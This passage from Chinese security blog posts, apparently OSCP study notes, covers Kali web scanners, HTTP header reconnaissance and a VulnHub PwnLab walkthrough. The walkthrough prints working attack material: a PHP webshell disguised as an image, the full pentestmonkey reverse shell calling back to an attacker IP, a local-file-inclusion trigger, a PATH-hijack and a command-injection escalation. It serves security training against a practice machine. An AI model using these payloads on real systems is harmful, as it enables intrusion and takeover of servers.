资产普查阶段的服务器风险初筛
合规性检查（如安全头部、版本生命周期）
红蓝对抗中的外围打点侦查

替代方案：

# 需隐蔽扫描 → 使用 dirsearch + 随机UA 
# 需深度检测 → 结合 Burp Suite 手动测试

Kali中的其他网络漏洞扫描工具

根据您提供的图片信息，以下是对截图中的除Nikto外的六个安全测试工具的介绍、用法及核心优势：

1. davtest

功能：
测试 WebDAV（基于HTTP的文件传输协议）服务器的配置安全性，探测其支持的方法（如PUT/DELETE）是否存在漏洞。
基本用法：

davtest -url http://target.com/webdav/

优势用法：

自动上传恶意文件：尝试上传WebShell（如.jsp/.php）测试执行权限。
方法枚举：用 -move 和 -sendbd auto 自动测试文件上传+移动漏洞。
适用场景：
快速检测可写WebDAV目录和危险方法（如PUT）开放情况。

2. nuclei

功能：
基于YAML模板的高速漏洞扫描工具，社区提供数千预置模板（CVE检测、配置错误等）。
基本用法：

nuclei -u http://target.com -t cves/ -severity critical

优势用法：

批量目标扫描：nuclei -list urls.txt -t exposures/configs/（结合子域名枚举结果）。
自定义模板：快速编写YAML规则检测0day或内部系统漏洞。
核心优势：

海量模板+高并发：单机每秒处理数百请求，适合全网段资产快速筛查。 ==推荐模板全家桶仓库：==https://github.com/emadshanab/Nuclei-Templates-Collection/

3. skipfish

功能：
主动爬取式扫描器，生成交互式报告，擅长检测注入、XSS等Web漏洞。
基本用法：

skipfish -o ./report http://target.com

优势用法：

深度扫描：-I /api/ 限定路径避免爬虫过载。
误报调优：用 -l xss,exec 仅扫描高风险漏洞类型。
核心优势：

动态语法分析：模拟执行JavaScript，优于静态爬虫（如dirb）。

4. wapiti

功能：
轻量级黑盒漏洞扫描器，支持GET/POST参数测试（SQLi/XSS/命令注入等）。
基本用法：

wapiti -u http://target.com/ -f html -o report.html

优势用法：

绕过WAF：--skip="logout" 忽略登出链接维持会话。
表单注入测试：对登录框、搜索框自动注入Payload。
适用场景：
快速验证常见Web漏洞，输出简洁报告供开发修复参考。

5. whatweb

功能：
技术栈指纹识别工具，通过HTTP响应识别CMS、框架、服务器等。
基本用法：

whatweb -v http://target.com

优势用法：

批量识别：whatweb -i targets.txt --open-timeout=30
深度探测：--aggression=3（最大强度分析JS/Cookies等）。
核心价值：

10秒内识别目标技术栈（如WordPress 6.4.3 + PHP 8.2 + Nginx），为后续漏洞利用提供方向。

6. wpscan

功能：
WordPress专项扫描器，检测主题/插件漏洞、弱密码、配置错误等。
基本用法：

wpscan --url http://target.com

优势用法：

暴力破解：--passwords /path/to/wordlist.txt 枚举后台账号。
漏洞利用：--plugin vuln-slug --vulnerabilities 检测已知漏洞插件。
核心优势：

实时同步WP漏洞库：精准识别超过54,000个插件/主题漏洞（需API key）。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day23 Kali网络应用程序攻击

Sat, 26 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

对应OSCP官方教材第九章，这里只简要介绍top10的web漏洞，详细的漏洞用法有专门的专题讲解。

🔍 Web应用漏洞特性

特点	原因分析	应对策略
大攻击面	多依赖库+欠安全配置	依赖成分分析(SCA)工具辅助
技术栈无关性	OWASP Top 10漏洞普遍存在	掌握通用漏洞原理(SQLi/XSS/SSRF)
框架隐蔽性	路由机制隐藏文件扩展名	聚焦源码特征而非URL扩展

🚀 渗透测试四步方法论

graph TB
 A[信息收集] --> B[漏洞探测]
 B --> C[权限提升]
 C --> D[横向移动]
 
 subgraph A[信息收集]
 A1[技术栈识别] -->|语言/框架| A2[响应头分析]
 A1 -->|服务器/DB| A3[页面内容审查]
 A1 -->|敏感路径| A4[站点地图扫描]
 end

1. 信息收集核心技巧

途径	操作指令/位置	关键情报
URL解析	浏览器地址栏	`.jsp`(Java) `.aspx`(ASP.NET)
页面源码	Firefox `Ctrl+Shift+C` → 检查元素	jQuery版本/隐藏表单/注释信息
响应头	开发者工具 → 网络 → 点击请求	`Server: nginx/1.18.0`
站点地图	`curl https://target/robots.txt`	禁用爬取的敏感路径(如/admin)
管理后台	主动扫描 `/manager/html` `/wp-admin`	Tomcat/WordPress等默认入口

⚠️ 技术要点

1. 响应头情报价值

# 查看完整响应头
curl -I https://example.com

# 关键头解析示例
Server: Apache/2.4.29 (Ubuntu) # Web服务指纹
X-Powered-By: PHP/7.2.24 # 后端语言版本
X-AspNet-Version: 4.0.30319 # .NET框架版本

2. 源码分析三板斧

框架识别：
- React：查找 ReactDOM.render(
- Vue：搜索 new Vue({
敏感注释： 
客户端控制： <input type="hidden" name="isAdmin" value="false">

3. 后台路径字典

/console # WebLogic
/adminer.php # Adminer数据库管理
/kibana # ELK管理界面
:8080/manage # JBoss

实战案例

官方靶场网站：https://www.megacorpone.com

网站基本信息

可以使用Wappalyzer插件查看网站所用技术框架。

或使用whatweb工具查看

1whatweb https://www.megacorpone.com/

按F12或右键“检查”网页打开控制台查看网页信息

控制台中可以输入Js代码

点击最终便的按钮可以选择页面元素查看代码，文件上传后找上传的路径最好用。
检查网站常见文件是robots.txt和sitemap.xml。

一般是脚本在终端中爬取有配合其他命令自动化执行。

Burp抓包请求头和响应头分析

一、HTTP 请求头关键字段解析

 1GET / HTTP/1.1
 2Host: www.megacorpone.com
 3User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 5Accept-Language: en-US,en;q=0.5
 6Accept-Encoding: gzip, deflate, br
 7Dnt: 1
 8Upgrade-Insecure-Requests: 1
 9Sec-Fetch-Dest: document
10Sec-Fetch-Mode: navigate
11Sec-Fetch-Site: cross-site
12Priority: u=0, i
13Pragma: no-cache
14Cache-Control: no-cache
15Te: trailers
16Connection: keep-alive

请求方法
GET / HTTP/1.1
- 方法：GET（获取资源）
- 目标：根路径 /（通常为首页）
- 协议：HTTP/1.1（支持持久连接）
核心元数据
- Host: www.megacorpone.com
  请求的目标域名（用于虚拟主机路由）。
- User-Agent: Mozilla/5.0 (...) Firefox/133.0
  客户端浏览器和操作系统信息（可推断为 Win10 x64 的 Firefox 133）。
内容协商
- Accept: text/html, ...
  客户端支持的格式优先级：HTML > XHTML/XML > 其他类型。
- Accept-Language: zh-CN, zh;q=0.8 ...
  语言优先级：简体中文 > 广义中文 > 台湾繁体 > 香港繁体 > 英语。
- Accept-Encoding: gzip, deflate, br, zstd
  支持的压缩格式（服务器可选其一压缩响应）。
连接管理
- Connection: keep-alive
  要求复用 TCP 连接（减少重复握手开销）。
安全策略
- Upgrade-Insecure-Requests: 1
  建议升级到 HTTPS。
- Sec-Fetch-* 系列：
  - Dest: document – 目标为文档（如 HTML）。
  - Mode: navigate – 导航类请求（如页面跳转）。
  - Site: cross-site – 跨站请求（触发 CORS 校验）。

二、HTTP 响应头关键字段解析

 1HTTP/1.1 200 OK
 2Date: Mon, 28 Jul 2025 07:37:17 GMT
 3Server: Apache/2.4.62 (Debian)
 4Last-Modified: Wed, 06 Nov 2019 15:04:14 GMT
 5ETag: "390b-596aedca79780-gzip"
 6Accept-Ranges: bytes
 7Vary: Accept-Encoding
 8Content-Length: 14603
 9Keep-Alive: timeout=5, max=100
10Connection: Keep-Alive
11Content-Type: text/html

状态行
HTTP/1.1 200 OK
- 协议：HTTP/1.1
- 状态码：200（请求成功）
- 描述：OK（资源已返回）
服务器信息
- Server: Apache/2.4.62 (Debian)
  Web 服务器为 Apache 2.4.62，运行于 Debian 系统。
- Last-Modified: Wed, 06 Nov 2019 ...
  资源最后修改时间（用于客户端缓存验证）。
资源标识
- ETag: "390b-596aedca79780-gzip"
  资源唯一标识符（含 gzip 压缩标记）。
- Accept-Ranges: bytes
  支持按字节范围请求（用于断点续传）。
内容传输
- `Content-Length: 14603 压缩后资源大小为 14603 字节。
- Content-Type: text/html
  资源类型为 HTML 文档。
缓存优化
- Vary: Accept-Encoding
  缓存策略依据 Accept-Encoding 变化（不同压缩版本独立缓存）。
连接控制
- Connection: Keep-Alive
  保持 TCP 连接活跃。
- Keep-Alive: timeout=5, max=100
  连接空闲超时 5 秒，最多复用 100 次请求。

三、渗透测试中的关键关注点

服务器指纹
- Server 字段直接泄露 Web 服务器类型（Apache）、版本（2.4.62）、系统（Debian）。
- 风险：暴露已知漏洞的攻击面（如特定版本漏洞）。
隐藏技术栈标记
- 非标准响应头（如 X-Powered-By: PHP/8.1）可能泄露后端语言或框架。
- 操作建议：检查是否存在 X-Aspnet-Version 等字段，或通过 php.ini 设置 expose_php=off 隐藏 PHP 信息。
缓存机制利用
- ETag 和 Last-Modified 可用于构造条件请求，探测资源是否更新。
- 若返回 304 Not Modified，可能节省攻击流量。
压缩与编码
- Content-Encoding: gzip 需先解压再分析响应内容。
- 工具如 Burp Suite 自动处理压缩数据。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day21 PwnLab init靶场WP

Fri, 25 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/pwnlab-init,158/

PwnLab是古早的退役机器，通过这个机器的练习，可以认识OSCP入门的基本难度。

信息收集

1# 靶机地址
2172.168.169.143
3# Kali攻击机地址
4172.168.169.141

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 172.168.169.143 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.143
4sudo nmap --script=vuln -p$ports -Pn 172.168.169.143

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ echo $ports
 380,111,3306,46298
 4
 5┌──(kali㉿kali)-[~/Desktop]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 172.168.169.143
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 08:33 EDT
 8Nmap scan report for 172.168.169.143
 9Host is up (0.0019s latency).
10
11PORT STATE SERVICE VERSION
1280/tcp open http Apache httpd 2.4.10 ((Debian))
13|_http-server-header: Apache/2.4.10 (Debian)
14|_http-title: PwnLab Intranet Image Hosting
15111/tcp open rpcbind 2-4 (RPC #100000)
16| rpcinfo:
17| program version port/proto service
18| 100000 2,3,4 111/tcp rpcbind
19| 100000 2,3,4 111/udp rpcbind
20| 100000 3,4 111/tcp6 rpcbind
21| 100000 3,4 111/udp6 rpcbind
22| 100024 1 46298/tcp status
23| 100024 1 47125/udp status
24| 100024 1 56014/udp6 status
25|_ 100024 1 59462/tcp6 status
263306/tcp open mysql MySQL 5.5.47-0+deb8u1
27| mysql-info:
28| Protocol: 10
29| Version: 5.5.47-0+deb8u1
30| Thread ID: 44
31| Capabilities flags: 63487
32| Some Capabilities: DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, FoundRows, Support41Auth, Speaks41ProtocolOld, LongPassword, ODBCClient, SupportsTransactions, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, ConnectWithDatabase, SupportsLoadDataLocal, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
33| Status: Autocommit
34| Salt: r"OEN9pLgCWm>-c0`vRt
35|_ Auth Plugin Name: mysql_native_password
3646298/tcp open status 1 (RPC #100024)
37MAC Address: 00:0C:29:D8:39:9C (VMware)
38Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
39Device type: general purpose
40Running: Linux 3.X|4.X
41OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
42OS details: Linux 3.2 - 4.14
43Network Distance: 1 hop
44
45OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
46Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds
47
48┌──(kali㉿kali)-[~/Desktop]
49└─$ sudo nmap --script=vuln -p$ports -Pn 172.168.169.143
50Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-23 08:34 EDT
51Nmap scan report for 172.168.169.143
52Host is up (0.00098s latency).
53
54PORT STATE SERVICE
5580/tcp open http
56|_http-dombased-xss: Couldn't find any DOM based XSS.
57| http-internal-ip-disclosure:
58|_ Internal IP Leaked: 127.0.1.1
59| http-cookie-flags:
60| /login.php:
61| PHPSESSID:
62|_ httponly flag not set
63|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
64|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
65| http-csrf:
66| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.168.169.143
67| Found the following possible CSRF vulnerabilities:
68|
69| Path: http://172.168.169.143:80/?page=login
70| Form id: user
71|_ Form action:
72| http-slowloris-check:
73| VULNERABLE:
74| Slowloris DOS attack
75| State: LIKELY VULNERABLE
76| IDs: CVE:CVE-2007-6750
77| Slowloris tries to keep many connections to the target web server open and hold
78| them open as long as possible. It accomplishes this by opening connections to
79| the target web server and sending a partial request. By doing so, it starves
80| the http server's resources causing Denial Of Service.
81|
82| Disclosure date: 2009-09-17
83| References:
84| http://ha.ckers.org/slowloris/
85|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
86| http-enum:
87| /login.php: Possible admin folder
88| /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
89|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
90111/tcp open rpcbind
913306/tcp open mysql
9246298/tcp open unknown
93MAC Address: 00:0C:29:D8:39:9C (VMware)
94
95Nmap done: 1 IP address (1 host up) scanned in 321.76 seconds

Nmap扫描发现了用户名是user，还有两个子目录/images/和/upload/，80端口打开是一个网页，提示需要登录，尝试弱密码和sql万能密码都无法登录。

发现主页的链接似乎是有文件包含。

1http://172.168.169.143/?page=php://filter/read=convert.base64-encode/resource=login

解码这串base64得到

 1<?php
 2session_start();
 3require("config.php");
 4$mysqli = new mysqli($server, $username, $password, $database);
 5
 6if (isset($_POST['user']) and isset($_POST['pass']))
 7{
 8	$luser = $_POST['user'];
 9	$lpass = base64_encode($_POST['pass']);
10
11	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
12	$stmt->bind_param('ss', $luser, $lpass);
13
14	$stmt->execute();
15	$stmt->store_Result();
16
17	if ($stmt->num_rows == 1)
18	{
19		$_SESSION['user'] = $luser;
20		header('Location: ?page=upload');
21	}
22	else
23	{
24		echo "Login failed.";
25	}
26}
27else
28{
29	?>
30	<form action="" method="POST">
31	<label>Username: </label><input id="user" type="test" name="user"><br />
32	<label>Password: </label><input id="pass" type="password" name="pass"><br />
33	<input type="submit" name="submit" value="Login">
34	</form>
35	<?php
36}

发现调用了config.php用同样的方法查看这个文件。得到用户名和密码root/H4u%QJ_H99,尝试登录，发现登录失败。

config的源码

1<?php
2$server	 = "localhost";
3$username = "root";
4$password = "H4u%QJ_H99";
5$database = "Users";
6?>

index的源码

 1<?php
 2//Multilingual. Not implemented yet.
 3//setcookie("lang","en.lang.php");
 4if (isset($_COOKIE['lang']))
 5{
 6	include("lang/".$_COOKIE['lang']);
 7}
 8// Not implemented yet.
 9?>
10<html>
11<head>
12<title>PwnLab Intranet Image Hosting</title>
13</head>
14<body>
15<center>
16<img src="images/pwnlab.png"><br />
17[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
18<hr/><br/>
19<?php
20	if (isset($_GET['page']))
21	{
22		include($_GET['page'].".php");
23	}
24	else
25	{
26		echo "Use this server to upload and share image files inside the intranet";
27	}
28?>
29</center>
30</body>
31</html>

同样的方法查看upload的源码

 1<?php
 2session_start();
 3if (!isset($_SESSION['user'])) { die('You must be log in.'); }
 4?>
 5<html>
 6	<body>
 7		<form action='' method='post' enctype='multipart/form-data'>
 8			<input type='file' name='file' id='file' />
 9			<input type='submit' name='submit' value='Upload'/>
10		</form>
11	</body>
12</html>
13<?php 
14if(isset($_POST['submit'])) {
15	if ($_FILES['file']['error'] <= 0) {
16		$filename = $_FILES['file']['name'];
17		$filetype = $_FILES['file']['type'];
18		$uploaddir = 'upload/';
19		$file_ext = strrchr($filename, '.');
20		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
21		$whitelist = array(".jpg",".jpeg",".gif",".png"); 
22
23		if (!(in_array($file_ext, $whitelist))) {
24			die('Not allowed extension, please upload images only.');
25		}
26
27		if(strpos($filetype,'image') === false) {
28			die('Error 001');
29		}
30
31		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
32			die('Error 002');
33		}
34
35		if(substr_count($filetype, '/')>1){
36			die('Error 003');
37		}
38
39		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
40
41		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
42			echo "<img src=\"".$uploadfile."\"><br />";
43		} else {
44			die('Error 4');
45		}
46	}
47}
48
49?>

Mysql登录获得用户名

回到一开始的Nmap扫描结果发现3306端口是打开的，也就是mysql服务，刚刚config.php的密码也似乎是mysql的密码，不是登录密码。试一下：

1mysql -uroot -h 172.168.169.143 -p --ssl

1mysql --skip-ssl -u root -p -h 192.168.107.29

设置跳过加密验证或使用数据库连接软件连接成功

查看用户名列表，发现3个用户名和密码，解码base64得到在登录界面可以输入的密码。

user	pass	解
kent	Sld6WHVCSkpOeQ==	JWzXuBJJNy
mike	U0lmZHNURW42SQ==	SIfdsTEn6I
kane	aVN2NVltMkdSbw==	iSv5Ym2GRo

输入任意组合密码即可登录。

文件上传

上传一个测试文件，发现上传后的文件存放在upload下面。

使用Burp抓包修改上传的请求，从之前的upload.php源码看，只能上传图片文件，就暂时不修改文件名，只测试是否有恶意内容检测，显示上传成功。

 1POST /?page=upload HTTP/1.1
 2Host: 172.168.169.143
 3Content-Length: 319
 4Cache-Control: max-age=0
 5Origin: http://172.168.169.143
 6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1vs6B8Q4tsVShuqH
 7Upgrade-Insecure-Requests: 1
 8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
 9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10Referer: http://172.168.169.143/?page=upload
11Accept-Encoding: gzip, deflate, br
12Accept-Language: zh-CN,zh;q=0.9
13Cookie: PHPSESSID=02c1kbpgina1jajknkhkj4d6o0
14Connection: keep-alive
15
16------WebKitFormBoundary1vs6B8Q4tsVShuqH
17Content-Disposition: form-data; name="file"; filename="pphp.png"
18Content-Type: image/png
19
20GIF89a
21<?php system($_GET["cmd"]);?>
22
23------WebKitFormBoundary1vs6B8Q4tsVShuqH
24Content-Disposition: form-data; name="submit"
25
26Upload
27------WebKitFormBoundary1vs6B8Q4tsVShuqH--

利用lang参数来把一句话木马带进来。

反弹Shell

上传一个反弹shell的完整php脚本，然后在lang中请求。

1rlwrap nc -lvnp 4777
2curl -v --cookie "lang=../upload/c91a703ee9be1019794f2dfe58855fbe.png" http://172.168.169.143/
3# 美化
4python -c 'import pty;pty.spawn("/bin/bash")'

 1POST /?page=upload HTTP/1.1
 2Host: 172.168.169.143
 3Content-Length: 4354
 4Cache-Control: max-age=0
 5Origin: http://172.168.169.143
 6Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1vs6B8Q4tsVShuqH
 7Upgrade-Insecure-Requests: 1
 8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
 9Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 10Referer: http://172.168.169.143/?page=upload
 11Accept-Encoding: gzip, deflate, br
 12Accept-Language: zh-CN,zh;q=0.9
 13Cookie: PHPSESSID=02c1kbpgina1jajknkhkj4d6o0
 14Connection: keep-alive
 15
 16------WebKitFormBoundary1vs6B8Q4tsVShuqH
 17Content-Disposition: form-data; name="file"; filename="reverse.png"
 18Content-Type: image/png
 19
 20GIF89a
 21
 22 <?php
 23 // php-reverse-shell - A Reverse Shell implementation in PHP
 24 // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
 25
 26 set_time_limit (0);
 27 $VERSION = "1.0";
 28 $ip = '172.168.169.141'; // You have changed this
 29 $port = 4777; // And this
 30 $chunk_size = 1400;
 31 $write_a = null;
 32 $error_a = null;
 33 $shell = 'uname -a; w; id; /bin/sh -i';
 34 $daemon = 0;
 35 $debug = 0;
 36
 37 //
 38 // Daemonise ourself if possible to avoid zombies later
 39 //
 40
 41 // pcntl_fork is hardly ever available, but will allow us to daemonise
 42 // our php process and avoid zombies. Worth a try...
 43 if (function_exists('pcntl_fork')) {
 44 // Fork and have the parent process exit
 45 $pid = pcntl_fork();
 46 
 47 if ($pid == -1) {
 48 printit("ERROR: Can't fork");
 49 exit(1);
 50 }
 51 
 52 if ($pid) {
 53 exit(0); // Parent exits
 54 }
 55
 56 // Make the current process a session leader
 57 // Will only succeed if we forked
 58 if (posix_setsid() == -1) {
 59 printit("Error: Can't setsid()");
 60 exit(1);
 61 }
 62
 63 $daemon = 1;
 64 } else {
 65 printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
 66 }
 67
 68 // Change to a safe directory
 69 chdir("/");
 70
 71 // Remove any umask we inherited
 72 umask(0);
 73
 74 //
 75 // Do the reverse shell...
 76 //
 77
 78 // Open reverse connection
 79 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 80 if (!$sock) {
 81 printit("$errstr ($errno)");
 82 exit(1);
 83 }
 84
 85 // Spawn shell process
 86 $descriptorspec = array(
 87 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
 88 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
 89 2 => array("pipe", "w") // stderr is a pipe that the child will write to
 90 );
 91
 92 $process = proc_open($shell, $descriptorspec, $pipes);
 93
 94 if (!is_resource($process)) {
 95 printit("ERROR: Can't spawn shell");
 96 exit(1);
 97 }
 98
 99 // Set everything to non-blocking
100 // Reason: Occsionally reads will block, even though stream_select tells us they won't
101 stream_set_blocking($pipes[0], 0);
102 stream_set_blocking($pipes[1], 0);
103 stream_set_blocking($pipes[2], 0);
104 stream_set_blocking($sock, 0);
105
106 printit("Successfully opened reverse shell to $ip:$port");
107
108 while (1) {
109 // Check for end of TCP connection
110 if (feof($sock)) {
111 printit("ERROR: Shell connection terminated");
112 break;
113 }
114
115 // Check for end of STDOUT
116 if (feof($pipes[1])) {
117 printit("ERROR: Shell process terminated");
118 break;
119 }
120
121 // Wait until a command is end down $sock, or some
122 // command output is available on STDOUT or STDERR
123 $read_a = array($sock, $pipes[1], $pipes[2]);
124 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
125
126 // If we can read from the TCP socket, send
127 // data to process's STDIN
128 if (in_array($sock, $read_a)) {
129 if ($debug) printit("SOCK READ");
130 $input = fread($sock, $chunk_size);
131 if ($debug) printit("SOCK: $input");
132 fwrite($pipes[0], $input);
133 }
134
135 // If we can read from the process's STDOUT
136 // send data down tcp connection
137 if (in_array($pipes[1], $read_a)) {
138 if ($debug) printit("STDOUT READ");
139 $input = fread($pipes[1], $chunk_size);
140 if ($debug) printit("STDOUT: $input");
141 fwrite($sock, $input);
142 }
143
144 // If we can read from the process's STDERR
145 // send data down tcp connection
146 if (in_array($pipes[2], $read_a)) {
147 if ($debug) printit("STDERR READ");
148 $input = fread($pipes[2], $chunk_size);
149 if ($debug) printit("STDERR: $input");
150 fwrite($sock, $input);
151 }
152 }
153
154 fclose($sock);
155 fclose($pipes[0]);
156 fclose($pipes[1]);
157 fclose($pipes[2]);
158 proc_close($process);
159
160 // Like print, but does nothing if we've daemonised ourself
161 // (I can't figure out how to redirect STDOUT like a proper daemon)
162 function printit ($string) {
163 if (!$daemon) {
164 print "$string
165";
166 }
167 }
168
169 ?> 
170 
171
172------WebKitFormBoundary1vs6B8Q4tsVShuqH
173Content-Disposition: form-data; name="submit"
174
175Upload
176------WebKitFormBoundary1vs6B8Q4tsVShuqH--

提权root

路径劫持攻击，kane提权为mike

home文件夹下发现有几个用户名，其中三个正是刚刚mysql中泄露了，猜测终端的用户密码可能和mysql中泄露的密码一样，尝试一下就真的进入了，典型的密码复用问题。

查看密码文件发现，john的用户权限可能更高，因为他的数字是1000，代表他是root之后新建的第一个用户，极有可能是管理员用户。kent用户下面没有特别的文件，kane用户文件夹下有个可执行文件，但是执行提示没找到mike文件夹下的msg.txt文件。Mike用户的密码不是mysql中的那个。

如果是官方靶机，这里就有第一个flag。

而且这个msgmike文件是mike用户给我们的，不是kane用户建立的，具有SUID权限。执行的结果发现：

$ /home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory

运行msgmike显示错误：尝试调用cat读取/home/mike/msg.txt
关键发现：程序使用相对路径调用系统命令cat，而不是绝对路径"/bin/cat"

思路就是看一下路径劫持提权的相关方法，让mgsmike文件以为cat是我们设置的"cat"而不是系统中的 /bin/cat，巧妙的用msgmike文件执行"cat"的提权命令，提权为mike后再看下一步。

创建恶意替代文件
```
1echo '/bin/sh' > cat
2chmod 777 cat
```
- 创建名为cat的文件，内容为/bin/sh（启动shell）
- 赋予完全权限（任何用户可执行）
劫持PATH环境变量
```
1export PATH=./:$PATH
```
- 将当前目录.添加到PATH变量最前面
- 优先级规则：系统会优先在当前目录查找可执行文件
执行SetUID程序
```
1./msgmike
```
- 运行拥有SetUID权限的msgmike程序（属主为mike）
- 当程序尝试执行cat命令时：
- 先在当前目录(./)查找 → 找到恶意cat
- 执行/bin/sh→ 开启新shell
- msg.txt找不到就找不到了，都提权成功了，管他找不找得到
权限升级
```
1$ id
2uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
```
- 新shell以程序所有者(mike)的身份运行
- 成功从kane提权至mike用户

程序逻辑漏洞，Mike提权为root

mike文件夹下发现一个可执行文件，输入什么输出什么，用strings看一下内容，猜测文件的逻辑是输入的内容存为变量再输出。

但是看文件的逻辑是，获取键入的字符，但是只echo了第一行到/root/messeges.txt中，后续的内容应该是会调用system这个逻辑。所以多输入用分号代表分行，就能输入第二行的提权命令了。

知识点补充

🧠 技术原理详解

1. SetUID程序特性

1// msgmike 代码模拟
2#include <stdlib.h>
3int main() {
4 system("cat /home/mike/msg.txt"); 
5}

msgmike拥有SetUID位：-rwsr-x---
执行时获得文件所有者(mike)的权限

2. Shell命令解析机制

当程序调用system("cat ...")时：

1/bin/sh -c "cat ..."

Shell按照PATH顺序查找可执行文件
PATH顺序：./> /usr/bin> /bin

3. 环境变量攻击链

graph TD
 A[SetUID程序 msgmike] -->|以mike权限运行system| B[调用系统命令 'cat']
 B --> C{Shell 查找 cat 命令}
 C -->|PATH 搜索顺序| D[检查当前目录 .]
 D -->|找到恶意 cat| E[执行 ./cat]
 E -->|内容为 '/bin/sh'| F[启动 shell 进程]
 F -->|继承 mike 权限| G[获得 mike 权限的 shell]
 C -->|PATH 搜索顺序| H[检查 /usr/bin]
 H -->|正常 cat| I[执行系统 cat]
 classDef red fill:#f9d5d5,stroke:#b85450;
 classDef green fill:#d5f9d5,stroke:#50b854;
 class A,B,C,E,F,G red;
 class H,I green;
 style C stroke:#333,stroke-width:2px;

⚠️ 必要条件

SetUID程序：必须存在属主权限更高的可执行文件
动态命令调用：程序使用相对路径调用系统命令
文件系统权限：攻击者需有目录写入权限
PATH变量可修改：环境变量未被锁定

🛡️ 防御措施

编码规范

1// 使用绝对路径代替相对路径
2system("/bin/cat /home/mike/msg.txt");

降低权限

1setuid(getuid()); // 执行外部命令前放弃特权

锁定环境

1# 设置安全PATH
2export PATH=/usr/bin:/bin

文件系统加固

1chmod g-s /home/kane # 移除SetGID位
2chattr +i msgmike # 锁定文件

程序逻辑分析与还原

🔍 关键字符串线索

Message for root:→ 程序提示用户输入
/bin/echo %s >> /root/messages.txt→ 核心命令模板
fgets, asprintf, system→ 重要函数调用

🧩 程序逻辑还原

 1#include <stdio.h>
 2#include <stdlib.h>
 3
 4int main() {
 5 // 1. 输出提示信息
 6 printf("Message for root:");
 7 
 8 // 2. 读取用户输入
 9 char input[256];
10 fgets(input, sizeof(input), stdin);
11 
12 // 3. 格式化系统命令
13 char *command = NULL;
14 asprintf(&command, "/bin/echo %s >> /root/messages.txt", input);
15 
16 // 4. 执行系统命令
17 system(command);
18 
19 // 5. 清理内存
20 free(command);
21 return 0;
22}

⚡️ 漏洞点与攻击面分析

命令注入漏洞 (Command Injection)
```
1# 利用方式示例
2$ ./msg2root
3Message for root:; whoami >> /root/exploit.txt;
```
- 分号;允许添加额外命令
- 恶意命令以root权限执行
格式化字符串漏洞 (Format String Vulnerability)
```
1asprintf(&command, "/bin/echo %s >> ...", input);
```
